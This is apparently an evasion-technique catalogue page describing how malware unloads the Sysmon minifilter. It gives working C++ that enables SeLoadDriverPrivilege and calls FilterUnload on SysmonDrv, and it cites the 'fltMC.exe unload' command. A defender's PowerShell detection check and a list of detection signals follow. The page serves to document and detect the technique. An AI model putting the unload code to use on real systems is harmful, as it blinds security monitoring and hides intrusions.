Windows C++ / Unloading Sysmon Driver

Author Unprotect
Platform Windows
Language C++
Technique Unloading Sysmon Driver

Description:

Sysmon collects its process, network, file and registry telemetry through SysmonDrv, a kernel-mode file system minifilter, and hands it to the user-mode Sysmon service for logging. A kernel driver is not a DLL: LoadLibrary() cannot map it into a user-mode process, GetProcAddress() cannot resolve an "Unload" export from it, and a driver's unload routine (the DriverUnload callback in its DRIVER_OBJECT) is invoked only by the kernel. What this technique actually does is ask the Filter Manager to detach and unload the minifilter. That is the operation performed by the built-in tool with "fltMC.exe unload SysmonDrv", and it is exposed programmatically by the FilterUnload() function in fltlib.dll, so malware can perform it in-process without spawning fltMC.exe. Either route needs an elevated process holding SeLoadDriverPrivilege. Once the driver is gone the Sysmon service keeps running but receives no further kernel events, so subsequent malicious activity is not recorded. Two caveats matter in practice: the driver name is SysmonDrv only by default (the -d install switch renames it, although the default altitude 385201 still identifies it in "fltmc filters" output), and the unload is itself a detection point, both through the fltMC.exe process creation that Sysmon records as Event ID 1 before the driver disappears and through the sudden absence of telemetry from a host that was reporting.

Code

// Unload the Sysmon minifilter through the Filter Manager API, the same
// operation "fltMC.exe unload SysmonDrv" performs. Needs an elevated process.
#include <windows.h>
#include <fltuser.h>
#include <stdio.h>
#pragma comment(lib, "fltlib.lib")   // FilterUnload() lives in fltlib.dll

// SeLoadDriverPrivilege is present but disabled in an elevated token; enable it
static BOOL EnableLoadDriverPrivilege(void)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp = {};
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    LookupPrivilegeValueW(NULL, L"SeLoadDriverPrivilege", &tp.Privileges[0].Luid);
    BOOL ok = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)
              && GetLastError() == ERROR_SUCCESS;
    CloseHandle(hToken);
    return ok;
}

int main(void)
{
    if (!EnableLoadDriverPrivilege())
    {
        printf("Cannot enable SeLoadDriverPrivilege; run elevated\n");
        return 1;
    }
    // Ask the Filter Manager to detach and unload the Sysmon minifilter.
    // "SysmonDrv" is the default name; Sysmon's -d install switch can change it.
    HRESULT hr = FilterUnload(L"SysmonDrv");
    if (FAILED(hr))
    {
        printf("FilterUnload failed: 0x%08lx\n", (unsigned long)hr);
        return 1;
    }
    // The Sysmon driver is unloaded: the service receives no further kernel
    // events, so malware can now proceed without being recorded by Sysmon
    return 0;
}
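The check a defender would run on a host suspected of this technique, as an added example that is not part of the original page or of Sysmon itself. It assumes the default driver name SysmonDrv and default altitude 385201 (both are parameters because an installer can rename the driver), parses "fltmc filters" output, reads the driver service state through WMI (kernel drivers are not visible to Get-Service), and looks in the Sysmon log for service state changes (Event ID 4) and for fltMC.exe "unload" invocations that Sysmon recorded as Event ID 1 before the driver went away. Run it elevated; fltmc refuses to enumerate otherwise.

```powershell
param(
    [string]$DriverName      = 'SysmonDrv',   # default; Sysmon -d renames it
    [string]$DefaultAltitude = '385201'       # Sysmon's default minifilter altitude
)

# 1. Loaded minifilters. "fltmc filters" prints two header lines, then
#    "<Filter Name> <Num Instances> <Altitude> <Frame>" per filter.
$filters = fltmc filters 2>$null |
    Select-Object -Skip 2 |
    Where-Object { $_ -match '^\S' } |
    ForEach-Object {
        $f = $_ -split '\s+'
        [pscustomobject]@{ Name = $f[0]; Instances = $f[1]; Altitude = $f[2]; Frame = $f[3] }
    }

$byName     = $filters | Where-Object Name     -eq $DriverName
$byAltitude = $filters | Where-Object Altitude -eq $DefaultAltitude   # catches a renamed driver

# 2. Driver service state from the SCM.
$drv = Get-CimInstance Win32_SystemDriver -Filter "Name='$DriverName'" -ErrorAction SilentlyContinue

# 3. Sysmon's own record of its service starting or stopping (Event ID 4).
$stateEvents = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 4
} -MaxEvents 5 -ErrorAction SilentlyContinue

# 4. fltMC.exe unload commands that Sysmon logged (Event ID 1) before the unload took effect.
$fltmcRuns = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1
} -MaxEvents 2000 -ErrorAction SilentlyContinue |
    Where-Object {
        $_.Message -match 'Image:\s+.*\\fltMC\.exe' -and
        $_.Message -match 'CommandLine:.*\bunload\b'
    }

[pscustomobject]@{
    MinifilterLoadedByName      = [bool]$byName
    MinifilterAtDefaultAltitude = [bool]$byAltitude
    DriverServiceState          = if ($drv) { $drv.State } else { 'not installed' }
    RecentServiceStateChanges   = @($stateEvents | ForEach-Object {
                                      "$($_.TimeCreated) $($_.Message.Split("`n")[0])" })
    FltmcUnloadInvocations      = @($fltmcRuns | ForEach-Object { $_.TimeCreated })
} | Format-List
```

A host where MinifilterLoadedByName and MinifilterAtDefaultAltitude are both false while DriverServiceState is still "Running" is the signature of this technique: the SCM still considers the driver started, but the Filter Manager no longer has it attached. An in-process FilterUnload() call leaves no fltMC.exe Event ID 1, so the absence of new Sysmon events after a given time is the remaining host-side signal and should be corroborated from the central log collector.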

Created

December 7, 2022

Last Revised

April 22, 2024